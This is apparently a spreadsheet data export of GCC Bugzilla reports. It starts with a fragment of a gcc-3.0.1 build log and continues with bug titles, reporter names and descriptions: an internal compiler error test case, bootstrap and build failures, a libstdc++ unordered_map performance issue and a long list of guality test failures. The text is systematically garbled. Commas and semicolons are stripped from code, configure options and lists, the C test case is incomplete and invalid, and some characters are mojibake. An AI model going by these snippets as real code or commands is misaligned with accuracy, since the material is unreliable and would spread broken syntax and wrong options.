gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic asprintf.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  mkstemps.c -o pic/mkstemps.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic mkstemps.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  setenv.c -o pic/setenv.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic setenv.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  sigsetmask.c -o pic/sigsetmask.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic sigsetmask.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  vasprintf.c -o pic/vasprintf.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic vasprintf.c
if [ x != x ] then \
  gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic  strncmp.c -o pic/strncmp.o \
else true fi
gcc -c -DHAVE_CONFIG_H -g -O2 -I. -I./../include  -W -Wall -Wtraditional -pedantic strncmp.c
rm -f libiberty.a
ar rc libiberty.a \
  argv.o choose-temp.o concat.o cplus-dem.o cp-demangle.o dyn-string.o fdmatch.o fnmatch.o getopt.o getopt1.o getpwd.o getruntime.o hashtab.o hex.o floatformat.o lbasename.o md5.o objalloc.o obstack.o partition.o pexecute.o safe-ctype.o sort.o spaces.o splay-tree.o strerror.o strsignal.o xatexit.o xexit.o xmalloc.o xmemdup.o xstrdup.o xstrerror.o  asprintf.o mkstemps.o setenv.o sigsetmask.o vasprintf.o strncmp.o 
true libiberty.a
rm -f needed-list touch needed-list \
for f in atexit calloc memchr memcmp memcpy memmove memset rename strchr strerror strncmp strrchr strstr strtol strtoul tmpnam vfprintf vprintf vfork waitpid bcmp bcopy bzero do \
  for g in asprintf.o mkstemps.o setenv.o sigsetmask.o vasprintf.o strncmp.o  do \
    case $g in \
      *$f*) echo $g &gt;&gt; needed-list  \
    esac \
  done \
done
echo argv.o choose-temp.o concat.o cplus-dem.o cp-demangle.o dyn-string.o fdmatch.o fnmatch.o getopt.o getopt1.o getpwd.o getruntime.o hashtab.o hex.o floatformat.o lbasename.o md5.o objalloc.o obstack.o partition.o pexecute.o safe-ctype.o sort.o spaces.o splay-tree.o strerror.o strsignal.o xatexit.o xexit.o xmalloc.o xmemdup.o xstrdup.o xstrerror.o &gt; required-list
make[2]: Entering directory `/usr/local/src/gcc-3.0.1/libiberty/testsuite'
make[2]: Nothing to be done for `all'.
make[2]: Leaving directory `/usr/local/src/gcc-3.0.1/libiberty/testsuite'
make[1]: Leaving directory `/usr/local/src/gcc-3.0.1/libiberty'
make[1]: Entering directory `/usr/local/src/gcc-3.0.1/zlib'
gcc -DPACKAGE=\zlib\ -DVERSION=\1.1.3\ -DHAVE_UNISTD_H=1 -DHAVE_GETPAGESIZE=1 -DHAVE_MMAP=1 -DHAVE_MEMCPY=1 -DHAVE_STRERROR=1 -DHAVE_UNISTD_H=1  -I. -I.      -g -O2 -c adler32.c
gcc -DPACKAGE=\zlib\ -DVERSION=\1.1.3\ -DHAVE_UNISTD_H=1 -DHAVE_GETPAGESIZE=1 -DHAVE_MMAP=1 -DHAVE_MEMCPY=1 -DHAVE_STRERROR=1 -DHAVE_UNISTD_H=1  -I. -I.      -g -O2 -c compress.c
gcc -DPACKAGE=\zlib\ -DVERSION=\1.1.3\ -DHAVE_UNISTD_H=1 -DHAVE_GETPAGESIZE=1 -DHAVE_MMAP=</t>
  </si>
  <si>
    <t>drkirkby</t>
  </si>
  <si>
    <t>GCC-20501</t>
  </si>
  <si>
    <t>gcc.dg/vect/vect-93.c fails on ia64-hpux</t>
  </si>
  <si>
    <t>The new test gcc.dg/vect-93.c shows the following results on ia64-hpux on
mainline both -mlp64 and -milp32.
FAIL: gcc.dg/vect/vect-93.c scan-tree-dump-times Alignment of access forced
using peeling 2
XPASS: gcc.dg/vect/vect-93.c scan-tree-dump-times Alignment of access forced
using peeling 3</t>
  </si>
  <si>
    <t>GCC-71987</t>
  </si>
  <si>
    <t>[7 Regression] ICE on valid code at -O1 and above on x86_64-linux-gnu: tree check: expected ssa_name have addr_expr in get_ops at tree-ssa-reassoc.c:3269</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current GCC trunk at -O1 and above on x86_64-linux-gnu in both 32-bit and 64-bit modes.  
This is a regression from 6.1.x. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160724 (experimental) [trunk revision 238696] (GCC) 
$ 
$ gcc-trunk -O0 small.c
$ gcc-6.1 -O1 small.c
$ 
$ gcc-trunk -O1 small.c
small.c: In function â€˜fn2â€™:
small.c:8:6: internal compiler error: tree check: expected ssa_name have addr_expr in get_ops at tree-ssa-reassoc.c:3269
 void fn2 ()
      ^~~
0xe7745c tree_check_failed(tree_node const* char const* int char const* ...)
	../../gcc-source-trunk/gcc/tree.c:9742
0xd81c18 tree_check
	../../gcc-source-trunk/gcc/tree.h:3023
0xd81c18 get_ops
	../../gcc-source-trunk/gcc/tree-ssa-reassoc.c:3269
0xd882ba maybe_optimize_range_tests
	../../gcc-source-trunk/gcc/tree-ssa-reassoc.c:3523
0xd8e8f1 reassociate_bb
	../../gcc-source-trunk/gcc/tree-ssa-reassoc.c:5260
0xd8e187 reassociate_bb
	../../gcc-source-trunk/gcc/tree-ssa-reassoc.c:5469
0xd8e187 reassociate_bb
	../../gcc-source-trunk/gcc/tree-ssa-reassoc.c:5469
0xd90d3b do_reassoc
	../../gcc-source-trunk/gcc/tree-ssa-reassoc.c:5583
0xd90d3b execute_reassoc
	../../gcc-source-trunk/gcc/tree-ssa-reassoc.c:5670
0xd90d3b execute
	../../gcc-source-trunk/gcc/tree-ssa-reassoc.c:5709
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
--------------------------------
int a b *c *d
short fn1 (int p1)
{
  return a ? p1 : a
}
void fn2 ()
{
  int e *f = 
  b = fn1 (d != 
  c = f
}
int main ()
{
  fn2 ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-8402</t>
  </si>
  <si>
    <t>GCC 3.2 does not comile the linux kernel</t>
  </si>
  <si>
    <t>The linux kernel does not compile with the 3.2 version of gcc. I had to reinstall the 2.96 to compile it properly.
Release:
3.2
Environment:
Linux Red Hat 8.0  AMD Athlon 1800+ 256 MB RAM
How-To-Repeat:
make bzImage (with gcc 3.2 installed)</t>
  </si>
  <si>
    <t>yap</t>
  </si>
  <si>
    <t>GCC-51126</t>
  </si>
  <si>
    <t>[4.7 Regression] Bootstrap failure at revision 181358 on x86_64-apple-darwin10</t>
  </si>
  <si>
    <t>Bootstrap fails at revision 181358 on x86_64-apple-darwin10 with
/opt/gcc/build_w/./gcc/xgcc -B/opt/gcc/build_w/./gcc/ -B/opt/gcc/gcc4.7w/x86_64-apple-darwin10.8.0/bin/ -B/opt/gcc/gcc4.7w/x86_64-apple-darwin10.8.0/lib/ -isystem /opt/gcc/gcc4.7w/x86_64-apple-darwin10.8.0/include -isystem /opt/gcc/gcc4.7w/x86_64-apple-darwin10.8.0/sys-include    -g -O2 -O2  -g -O2 -DIN_GCC   -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include   -pipe -fno-common -g -DIN_LIBGCC2 -fbuilding-libgcc -fno-stack-protector   -pipe -fno-common -I. -I. -I../.././gcc -I../../../work/libgcc -I../../../work/libgcc/. -I../../../work/libgcc/../gcc -I../../../work/libgcc/../include  -DHAVE_CC_TLS -DUSE_EMUTLS -o unwind-dw2_s.o -MT unwind-dw2_s.o -MD -MP -MF unwind-dw2_s.dep -DSHARED -fexceptions -c ../../../work/libgcc/unwind-dw2.c
In file included from /usr/include/string.h:148:0
                 from ../../../work/libgcc/../gcc/tsystem.h:101
                 from ../../../work/libgcc/unwind-dw2.c:27:
/usr/include/secure/_string.h: In function 'uw_frame_state_for':
/usr/include/secure/_string.h:80:3: internal compiler error: in decide_alg at config/i386/i386.c:22094</t>
  </si>
  <si>
    <t>GCC-81712</t>
  </si>
  <si>
    <t>gcc does not compile when using glib 2.26 (everything works fine with 2.25)</t>
  </si>
  <si>
    <t>The compilation process stops with the following error message:
./md-unwind-support.h: In function 'x86_64_fallback_frame_state':
./md-unwind-support.h:65:47: error: dereferencing pointer to incomplete type 'struct ucontext'
       sc = (struct sigcontext *) (void *) 
                                               ^~
make[3]: Leaving directory `/disk2/build/gcc-7.1.0-build/x86_64-pc-linux-gnu/libgcc'
make[3]: *** [unwind-dw2.o] Error 1
make[2]: Leaving directory `/disk2/build/gcc-7.1.0-build'
make[2]: *** [all-target-libgcc] Error 2
make[1]: Leaving directory `/disk2/build/gcc-7.1.0-build'
make[1]: *** [all] Error 2</t>
  </si>
  <si>
    <t>GCC-22272</t>
  </si>
  <si>
    <t>endless loop during compile of all-target-libstdc++-v3</t>
  </si>
  <si>
    <t>Hi
I encounter an endless loop during the compile of all-target-libstdc++-v3
It goes like
Adding multilib support to Makefile in .
multidirs=pthread power powerpc pthread/power pthread/powerpc
with_multisubdir=
Running configure in multilib subdirs pthread power powerpc pthread/power
pthread/powerpc
pwd: /obj/pkg/lang/gcc3-c++/work/gcc-3.3.5/powerpc-ibm-aix4.3.3.0/libstdc++-v3
and after that it goes through every multidir. After linking+configure in
pthread/powerpc it restarts the whole thing with
pthread5.cc             ..linked
pthread6.cc             ..linked
testsuite_flags.in              ..linked
gmake[2]: Entering directory
`/obj/pkg/lang/gcc3-c++/work/gcc-3.3.5/powerpc-ibm-aix4.3.3.0/pthread/powerpc/libstdc++-v3'
/bin/sh ./config.status --recheck
running /bin/sh ./configure  --cache-file=../config.cache
--with-multisubdir=pthread/powerpc --with-multisrctop=../../ --enable-multilib
--cache-file=../config.cache --host=powerpc-ibm-aix4.3.3.0
--build=powerpc-ibm-aix4.3.3.0 --enable-multilib
--with-gcc-version-trigger=/obj/pkg/lang/gcc3-c++/work/gcc-3.3.5/gcc/version.c
--prefix=/opt/pkg/gcc3 --disable-aix64 --disable-shared --enable-languages=c++
--srcdir=. --with-target-subdir=powerpc-ibm-aix4.3.3.0 --no-create --no-recursion
loading cache ../config.cache
I'm not shure if that matters but after each multilib-dir it writes sth. like
Adding multilib support to Makefile in .
with_multisubdir=powerpc
chmod: mkcheck: No such file or directory
chmod: testsuite_flags: No such file or directory
Running configure in multilib subdir pthread/power
pwd: /obj/pkg/lang/gcc3-c++/work/gcc-3.3.5/powerpc-ibm-aix4.3.3.0
Building symlink tree in
/obj/pkg/lang/gcc3-c++/work/gcc-3.3.5/powerpc-ibm-aix4.3.3.0/pthread/power/libstdc++-v3
I'm not shure if the chmod errors are critical?
The following versions of gcc are installed:
gcc (GCC) 3.3.5
g++ (GCC) 3.3.4
Configure arguments where
--prefix=/opt/pkg/gcc3 --host=powerpc-ibm-aix4.3.3.0 --disable-aix64
--disable-shared  --enable-languages=c++</t>
  </si>
  <si>
    <t>lehmann</t>
  </si>
  <si>
    <t>GCC-50257</t>
  </si>
  <si>
    <t>[C++0x] unordered_map slow initialization due to huge __prime_list</t>
  </si>
  <si>
    <t>The constructor for std::unordered_map calls _Prime_rehash_policy::_M_next_bkt to determine the initial size of the hashtable.  That method computes the size by looking for the next largest number in a large list of primes (in src/hashtable-aux.cc) which it does using lower_bound.  However this list is very big - I counted it as 310 elements of 8 bytes each on a 64 bit machine or ~ 2.4KB accessed in a way (lower_bound) that probably causes lots of cache misses.  This lower_bound call comes up as a performance hotspot on my profiles.
I think that:
1) the initial granularity is probably overkill.  The inital entries are:
 2ul 3ul 5ul 7ul 11ul 13ul 17ul 19ul 23ul 29ul 31ul
    37ul 41ul 43ul 47ul 53ul 59ul 61ul 67ul 71ul 73ul 79ul
    83ul 89ul 97ul 103ul 109ul 113ul 127ul 137ul 139ul 149ul
    157ul 167ul 179ul 193ul 199ul 211ul 227ul 241ul 257ul...
Overall performance would probably be better/comparable with e.g. 11ul 31ul 127ul 241ul.
2) we should special-case the first values or (at the very least) the value when size is specified in the unordered_map constructor (I think that's 10).
I also found this prime list which looks a lot more reasonable in terms of the density: http://gcc.gnu.org/ml/gcc-patches/2009-05/msg01293.html
One of the problems is that this list of primes serves three purposes:
1) Initial allocation when no size is specified (for which it is slow)
2) Initial allocation when the user is specifying the size (when we probably want a size as close as possible to the target number)
3) Resizing (when again we want a size as close as possible to the size we've computed)
I think that this is probably a good list for purpose #2 and #3 but it is pretty painful for #1.  Unfortunately #1 is the probably the most common use case I would think.  An alternative fix would be to have two different _Prime_rehash_policy strategies: one for people that know the size of their hashtable and one for people that just want sensible defaults.  I don't think _Prime_rehash_policy is a good match for the second group and I suspect the second group is the majority.
Is this the right place to raise this or would the mailing list be better?</t>
  </si>
  <si>
    <t>GCC-57505</t>
  </si>
  <si>
    <t>[C++11] destructor of std::function should be noexcept</t>
  </si>
  <si>
    <t>Created attachment 30243
Test case
According to http://en.cppreference.com/w/cpp/utility/functional/function/~function the destructor of std::function like all standard destructors should be noexcept but as the attached test case shows it isn't so:
% g++-4.7 -std=c++11 test.cpp 
test.cpp:4:1: error: static assertion failed: ~function is not noexcept</t>
  </si>
  <si>
    <t>f.heckenbach</t>
  </si>
  <si>
    <t>GCC-35379</t>
  </si>
  <si>
    <t>-MT generates a target string too long over two lines</t>
  </si>
  <si>
    <t>Precondition: an empty file named dummy.c exists in the current directory.
The following command:
arm-elf-gcc -c -MM -MT 123456789a123456789b123456789c123456789d123456789e123456789f123456789g123 dummy.c
generates the following output:
 \
 123456789a123456789b123456789c123456789d123456789e123456789f123456789g123:  \
 dummy.c
Starting with a redundant  \ .
The length of the -MT argument is 73 characters. For 72 characters this does not happen. The following command:
arm-elf-gcc -c -MM -MT 123456789a123456789b123456789c123456789d123456789e123456789f123456789g12 dummy.c
generates the following output:
123456789a123456789b123456789c123456789d123456789e123456789f123456789g12:  \
 dummy.c
(the redundant spaces may interfere with make operation apparently)
arm-elf-gcc -v output:
Using built-in specs.
Target: arm-elf
Configured with: ../../gcc-4.1.1/configure --enable-languages=cc++ --enable-int
erwork --enable-multilib --with-gcc --with-gnu-ld --with-gnu-as --with-stabs --d
isable-shared --disable-threads --disable-libssp --disable-libstdcxx-pch --disab
le-libmudflap --disable-win32-registry --disable-nls --disable-debug --without-h
eaders --with-newlib --target=arm-elf --prefix=c:/WinARM -v
Thread model: single
gcc version 4.1.1 (WinARM)</t>
  </si>
  <si>
    <t>uriah</t>
  </si>
  <si>
    <t>GCC-1250</t>
  </si>
  <si>
    <t>Function GC_debug_object_start does not exist</t>
  </si>
  <si>
    <t xml:space="preserve">Responsible-Changed-From-To: tromey-&gt;green
Responsible-Changed-Why: I've submitted a patch.
</t>
  </si>
  <si>
    <t>charles.gauthier</t>
  </si>
  <si>
    <t>GCC-56006</t>
  </si>
  <si>
    <t>[4.8 Regression] Many guality testsuite failures</t>
  </si>
  <si>
    <t>On Linux/x86 revision 195227 gave
FAIL: gcc.dg/guality/drap.c  -O1  line 21 a == 5
FAIL: gcc.dg/guality/drap.c  -O1  line 22 b == 6
FAIL: gcc.dg/guality/drap.c  -O2  line 21 a == 5
FAIL: gcc.dg/guality/drap.c  -O2  line 22 b == 6
FAIL: gcc.dg/guality/drap.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 21 a == 5
FAIL: gcc.dg/guality/drap.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 22 b == 6
FAIL: gcc.dg/guality/drap.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 21 a == 5
FAIL: gcc.dg/guality/drap.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 22 b == 6
FAIL: gcc.dg/guality/drap.c  -O3 -fomit-frame-pointer  line 21 a == 5
FAIL: gcc.dg/guality/drap.c  -O3 -fomit-frame-pointer  line 22 b == 6
FAIL: gcc.dg/guality/drap.c  -O3 -g  line 21 a == 5
FAIL: gcc.dg/guality/drap.c  -O3 -g  line 22 b == 6
FAIL: gcc.dg/guality/drap.c  -Os  line 21 a == 5
FAIL: gcc.dg/guality/drap.c  -Os  line 22 b == 6
FAIL: gcc.dg/guality/pr36728-1.c  -O1  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-1.c  -O1  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-1.c  -O1  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-1.c  -O1  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-1.c  -O1  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-1.c  -O1  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-1.c  -O1  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-1.c  -O1  line 18 arg1 == 1
FAIL: gcc.dg/guality/pr36728-1.c  -O1  line 18 arg2 == 2
FAIL: gcc.dg/guality/pr36728-1.c  -O1  line 18 arg3 == 3
FAIL: gcc.dg/guality/pr36728-1.c  -O1  line 18 arg4 == 4
FAIL: gcc.dg/guality/pr36728-1.c  -O1  line 18 arg5 == 5
FAIL: gcc.dg/guality/pr36728-1.c  -O1  line 18 arg6 == 6
FAIL: gcc.dg/guality/pr36728-1.c  -O1  line 18 arg7 == 30
FAIL: gcc.dg/guality/pr36728-1.c  -O2  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-1.c  -O2  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-1.c  -O2  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-1.c  -O2  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-1.c  -O2  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-1.c  -O2  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-1.c  -O2  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-1.c  -O2  line 18 arg1 == 1
FAIL: gcc.dg/guality/pr36728-1.c  -O2  line 18 arg2 == 2
FAIL: gcc.dg/guality/pr36728-1.c  -O2  line 18 arg3 == 3
FAIL: gcc.dg/guality/pr36728-1.c  -O2  line 18 arg4 == 4
FAIL: gcc.dg/guality/pr36728-1.c  -O2  line 18 arg5 == 5
FAIL: gcc.dg/guality/pr36728-1.c  -O2  line 18 arg6 == 6
FAIL: gcc.dg/guality/pr36728-1.c  -O2  line 18 arg7 == 30
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 18 arg1 == 1
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 18 arg2 == 2
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 18 arg3 == 3
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 18 arg4 == 4
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 18 arg5 == 5
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 18 arg6 == 6
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 18 arg7 == 30
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 18 arg4 == 4
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 18 arg5 == 5
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 18 arg6 == 6
FAIL: gcc.dg/guality/pr36728-1.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 18 arg7 == 30
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -fomit-frame-pointer  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -fomit-frame-pointer  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -fomit-frame-pointer  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -fomit-frame-pointer  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -fomit-frame-pointer  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -fomit-frame-pointer  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -fomit-frame-pointer  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -fomit-frame-pointer  line 18 arg1 == 1
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -fomit-frame-pointer  line 18 arg2 == 2
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -fomit-frame-pointer  line 18 arg3 == 3
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -fomit-frame-pointer  line 18 arg4 == 4
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -fomit-frame-pointer  line 18 arg5 == 5
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -fomit-frame-pointer  line 18 arg6 == 6
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -fomit-frame-pointer  line 18 arg7 == 30
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -g  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -g  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -g  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -g  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -g  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -g  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -g  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -g  line 18 arg1 == 1
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -g  line 18 arg2 == 2
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -g  line 18 arg3 == 3
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -g  line 18 arg4 == 4
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -g  line 18 arg5 == 5
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -g  line 18 arg6 == 6
FAIL: gcc.dg/guality/pr36728-1.c  -O3 -g  line 18 arg7 == 30
FAIL: gcc.dg/guality/pr36728-1.c  -Os  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-1.c  -Os  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-1.c  -Os  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-1.c  -Os  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-1.c  -Os  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-1.c  -Os  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-1.c  -Os  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-1.c  -Os  line 18 arg1 == 1
FAIL: gcc.dg/guality/pr36728-1.c  -Os  line 18 arg2 == 2
FAIL: gcc.dg/guality/pr36728-1.c  -Os  line 18 arg3 == 3
FAIL: gcc.dg/guality/pr36728-1.c  -Os  line 18 arg4 == 4
FAIL: gcc.dg/guality/pr36728-1.c  -Os  line 18 arg5 == 5
FAIL: gcc.dg/guality/pr36728-1.c  -Os  line 18 arg6 == 6
FAIL: gcc.dg/guality/pr36728-1.c  -Os  line 18 arg7 == 30
FAIL: gcc.dg/guality/pr36728-2.c  -O1  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-2.c  -O1  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-2.c  -O1  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-2.c  -O1  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-2.c  -O1  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-2.c  -O1  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-2.c  -O1  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-2.c  -O1  line 18 arg1 == 1
FAIL: gcc.dg/guality/pr36728-2.c  -O1  line 18 arg2 == 2
FAIL: gcc.dg/guality/pr36728-2.c  -O1  line 18 arg3 == 3
FAIL: gcc.dg/guality/pr36728-2.c  -O1  line 18 arg4 == 4
FAIL: gcc.dg/guality/pr36728-2.c  -O1  line 18 arg5 == 5
FAIL: gcc.dg/guality/pr36728-2.c  -O1  line 18 arg6 == 6
FAIL: gcc.dg/guality/pr36728-2.c  -O1  line 18 arg7 == 30
FAIL: gcc.dg/guality/pr36728-2.c  -O2  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-2.c  -O2  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-2.c  -O2  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-2.c  -O2  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-2.c  -O2  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-2.c  -O2  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-2.c  -O2  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-2.c  -O2  line 18 arg1 == 1
FAIL: gcc.dg/guality/pr36728-2.c  -O2  line 18 arg2 == 2
FAIL: gcc.dg/guality/pr36728-2.c  -O2  line 18 arg3 == 3
FAIL: gcc.dg/guality/pr36728-2.c  -O2  line 18 arg4 == 4
FAIL: gcc.dg/guality/pr36728-2.c  -O2  line 18 arg5 == 5
FAIL: gcc.dg/guality/pr36728-2.c  -O2  line 18 arg6 == 6
FAIL: gcc.dg/guality/pr36728-2.c  -O2  line 18 arg7 == 30
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg1 == 1
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg2 == 2
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg3 == 3
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg4 == 4
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg5 == 5
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg6 == 6
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 16 arg7 == 30
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 18 arg1 == 1
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 18 arg2 == 2
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 18 arg3 == 3
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 18 arg4 == 4
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 18 arg5 == 5
FAIL: gcc.dg/guality/pr36728-2.c  -O2 -flto -fno-use-linker-plugin -flto-partition=none  line 18 arg6 == 6
